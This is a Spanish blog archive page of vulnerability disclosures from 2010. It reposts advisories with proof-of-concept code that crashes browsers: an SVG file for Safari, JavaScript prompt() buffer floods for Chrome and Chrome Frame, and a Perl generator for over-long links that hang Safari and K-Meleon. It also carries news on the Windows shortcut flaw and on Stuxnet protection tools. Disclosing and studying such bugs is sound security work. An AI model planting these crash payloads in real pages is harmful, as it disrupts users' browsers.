Archive for the 'Vulnerabilidades' Category

No os preocupéis, sigo vivo !

Comentaros que aunque no me veáis escribir mucho por aquí ello tiene un signifcado; me estoy centrando más en un blog que comencé hace unos años en forma de proyecto y estoy dejando un poco de lado este, puesto que este es más de carácter personal y aquel más de carácter general por ello publico todo lo relacionado con la informática y algún que otro tema offtopic.

Click sobre la imágen para acceder 🙂

Anuncios

Safari for windows Invalid SGV text style Webkit.dll DoS

###################################################
Safari for windows Invalid SGV text style  Webkit.dll DoS
Afectado: http://www.apple.com
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Notificación al afectado: Sí Exploit disponible: Sí
###################################################

Safari Browser (en windows) es vulnerable siendo propenso a Denegaciones de Servicio, este problema afecta a webkit.dll y se bloquea al tratar de hacer que Safari abra una imagen SGV con un tamaño grande de fuente.

############
versiones
############

Safari para windows 5.0.1 (7533.17.8)
en windows 7 ultimate completamente parcheado.

Safari para windows windows 5.0.1 (7533.17.8)
en windows xp home sp3 completamente parcheado.

############
Línea de tiempo
############

Descubierto:19-08-2010
Notificado al vendedor:25-08-2010
Respuesta del vendedor:26-08-2010
Publicado: 30-09-2010

####################
PoC
####################

Guarda el código como “image.svg” y ábrelo con Safari, mirad como se añaden algunos píxeles “extra” en estilo de la fuente en el tamaño del texto.

################ BOF image.svg ######################

<?xml version=”1.0″?>
<svg xmlns=”http://www.w3.org/2000/svg&#8221; width=”200″ height=”200″ version=”1.1″>
<defs>
<mask id=”crash”>
<polygon points=”155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935″
transform=”matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)”
style=”fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1″ />
</mask>
</defs>

<g mask=”url(#crash)” style=”font-family:Verdana; font-size: 10pt; fill:red;”>
<text x=”80″ y=”80″ style=”font-size:111000000pt; fill:pink;”>Safari</text>
<text x=”0″ y=”130″ style=”font-size: 60pt; fill:pink;”>Now</text>
<text x=”20″ y=”190″ style=”font-size: 60pt; fill:pink;”>Crash</text>
</g>

</svg>

###############EOF####################

################# €nd ###############

Thnx To cLimbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)

thz Lost 😉

Google Chrome and Chrome frame Prompt DoS

###############################################
Google Chrome and Chrome frame Prompt DoS
Afectado: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Reporte en español: http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Notificación al afectado: Exploit disponible:
###############################################

Este bug ha sido descubierto por mí y ha sido testeado e investigado por cLimbo de #Ayuda-informaticos de la red iRC-Hispano (podéis encontrarnos allí)

#########
Resumen
#########

Algunas veces la necesidad de aplicaciones web en el sistema exponen algunos datos de los usuarios, se pueden vulnerar a través de un código Javascript, o por medio de formularios html, etcétera..

En el caso del código en Javascript pide accecer a los datos del sistema (la pregunta en sí es) es muy extenso ?

################

Google Chrome es propenso a una vulnerabilidad de denegación de servicio a través de “mensajes de alerta” cuando los datos esperados son muy extensos.

No sé si esto puede ser a su vez en una ejecución remota de código o una corrupción de la memoria o similares, pero creo que esta vulnerabilidad necesita analizarse y posteriormente parchearse.

###################
Versiones testeadas
###################

En todos los casos de Google Chrome es el vector el que produce alguna incongruencia en todos los sistemas 🙂

######################
MAC OS X leopard 10.5
######################

Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

In all cases OS X closes all Chrome Windows.( Chrome Crash)

##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In al cases Chrome is minimized and denies the access to
“window manager button” and we can´t no change beetwen applications
that we have open.

##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.

It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

in all cases Debian Closes all chrome Windows.( Chrome Crash)

####################
PoC
####################

Este PoC ha sido testeado en win7 32 bits, chrome and chrome frame en conjunto con IE8 causando una denegación de servicio en IE8.

#############################

<meta http-equiv=”X-UA-Compatible” content=”chrome=1″>
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape(‘%u0c0c%u0c0c’), 38000);
prompt(buffer);
}
setTimeout(‘DoS()’,1000);
</script>
// <![CDATA[
function do_buffer(payload, len) {
while(payload.length

################# EOF ###################

Este segundo PoC es para ser testeado en Linux o en Mac OS X

#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape(‘%u0c0c%u0c0c’), 50000);
prompt(buffer);
}
setTimeout(‘DoS()’,1000);
</script>

################# EOF ###################

// <![CDATA[
function do_buffer(payload, len) {
while(payload.length ############
Referencias
############
Vuln relacionada:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### €nd ###################

Thnx To cLimbo for his patience and support.

atentamente:
Lostmon (lostmon@gmail.com)
————

thz Lost 😉

Safari for windows Long link DoS

############################################
Safari for windows Long link DoS
URL del creador: http://www.apple.com/safari/
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Creador notificado: SÍ exploit disponible: SÍ
############################################

Safari es vulnerable a tareas con un enlace muy largo. Este problema es explotable por medio de enlaces web, como <a href=”very long URL”>click here</a> o vectores similares. Safari no ejecuta el enlace y congelada a su vez el navegador, acabando en una condición de denegación de servicio (DoS).

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

windows 7 Ultimate:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

####################
PoC
####################

#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long “a href” Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print “Usage: $0 <archivo.html>\n”;

}

$cabecera = “<html>” . “\n”;
$payload = “<a href=\”about:neterror?e=connectionFailure&c=” . “/” x 1028135 . “\”>click here if you can :)</a>” . “\n”;
$fin = “</html>”;

$datos = $cabecera . $payload . $fin;

open(FILE, ‘<‘ . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Links Relacionados
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Caso de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
——————
thz Lost 😉

K-Meleon for windows about:neterror Stack Overflow DoS

############################################
K-Meleon for windows about:neterror Stack Overflow DoS
URL creador: http://kmeleon.sourceforge.net/
Reportado por: http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Notificación al creador: SÍ Exploit disponible: SÍ
############################################

K-Meleon es un navegador web muy rápido, personalizable y ligero, basado en el motor de renderizado Gecko desarrollado por Mozilla, que es también usado por Firefox. K-Meleon es libre, es software de código abierto distribuido bajo la GNU General Public License y está diseñado específicamente para el OS Microsoft Windows (Win32).

K-Meleon es propenso a algunas vulnerabilidades, entre ellas: a colgarse con una URL muy larga, como about:neterror no limita la cantidad de caracteres que el usuario ponga en los parámetros ‘c’ ‘d’ si creamos una url malformada del navegador puede explotarse muy fácil. Esto es explotable a través de enlaces web, como por ejemplo; “haz clic aquí” o mediante window.location.replace url (‘muy largo’) o vectores similares.

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)

windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)

############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

########################
ASM code stack overflow
########################

################
# PoC
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long “a href” Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print “Usage: $0 <archivo.html>\n”;

}

$cabecera = “<html>” . “\n”;
$payload = “<a href=\”about:neterror?e=connectionFailure&c=” . “/” x 1028135 . “\”>click here if you can :)</a>” . “\n”;
$fin = “</html>”;

$datos = $cabecera . $payload . $fin;

open(FILE, ‘<‘ . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Casos de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
————-
thz Lost 😉

Microsoft publica parche para grave vulnerabilidad

La semana pasada posteé sobre una vulnerabilidad en la forma de mostrar los iconos de accesos directos en Windows, que permite la ejecución de código malicioso con sólo abrir una carpeta o un sitio web preparado para ello, e incluso ustedes nos informaron sobre la aparición de algunos casos. Como esto fue aprovechado por diversas familias de virus, Microsoft decidió adelantar la publicación del parche al día de hoy, para disminuir los riesgos de infección.

Esta actualización llega fuera del ciclo habitual, cuya próxima tanda estaba prevista para el martes 10 de agosto, porque la compañía detectó un aumento importante en los intentos de ataque y su expansión a nuevas zonas geográficas. La información proviene de productos como Microsoft Secutiry Essentials que, al igual que las soluciones de otros fabricantes, ya dispone de firmas actualizadas.

Las correcciones son distribuidas a través de la página Windows Update y las actualizaciones automáticas. Como esto afecta a gran parte de las versiones del sistema operativo, incluyendo varias que ya no cuentan con soporte (anteriores a XP SP3), es probable que la mayoría de los usuarios deba instalarlas.

Si aplicaron la solución provisoria Fix It, que impide mostrar las imágenes que representan a cada atajo, podrán quitarla luego del proceso y recuperar la funcionalidad habitual.

Seguir leyendo ‘Microsoft publica parche para grave vulnerabilidad’

Cómo protegerse del “exploit de los accesos directos”

La semana pasada, surgió una de esas noticias que nos ponen los pelos de punta: una vulnerabilidad en Windows, permite que accesos directos infectados inicien ficheros DLL maliciosos, con sólo abrir la carpeta en cuestión o cargar páginas web y documentos preparados para ello. Y pese a su confirmación por parte de Microsoft, todavía no existe un parche que la resuelva.

El problema está relacionado a la manera en que el sistema operativo muestra los iconos de archivos .lnk o .pif. Aunque el punto de entrada más común es un pen drive, inhabilitar la reproducción automática no lo evita. Esto afecta a todas las versiones de Windows, incluyendo las declaradas como obsoletas por la compañía.

Entonces… ¿cómo protegerse? Mientras aguardamos por la llegada de una actualización, se desarrollaron distintas herramientas que reducen las chances de infección:

  • Microsoft Fix It ofrece un sencillo ejecutable que modifica el registro para desactivar los íconos de los accesos directos. Aunque no signifique un trastorno para muchos, sí deberán tener en cuenta si algún usuario del equipo depende de la imagen para identificar el programa que desea iniciar.
  • Sophos Windows Shortcut Exploit Protection Tool realiza por su cuenta la carga de los atajos, bloqueando cualquiera que parezca dañino y ofreciendo alertas.
  • TrendMicro SysClean y la herramienta en línea HouseCall se encargan de la tarea más engorrosa: la limpieza del virus Stuxnet, uno de los que ya aprovecha este fallo.

Como consejo adicional, antes de usar cualquier dispositivo USB, es conveniente pasarlo por un antivirus. Lógicamente, es necesario tener actualizadas tanto la aplicación como las firmas de virus, para que sea verdaderamente efectiva.

Seguir leyendo ‘Cómo protegerse del “exploit de los accesos directos”’


Blog Stats

  • 613,065 visitas

RSS

Feed
noviembre 2017
L M X J V S D
« Sep    
 12345
6789101112
13141516171819
20212223242526
27282930  

Usuarios online:

counter

Otras URL’s

TiraEcol

Tira Ecol
BlogESfera Directorio de Blogs Hispanos - Agrega tu Blog
Google PageRank 
		Checker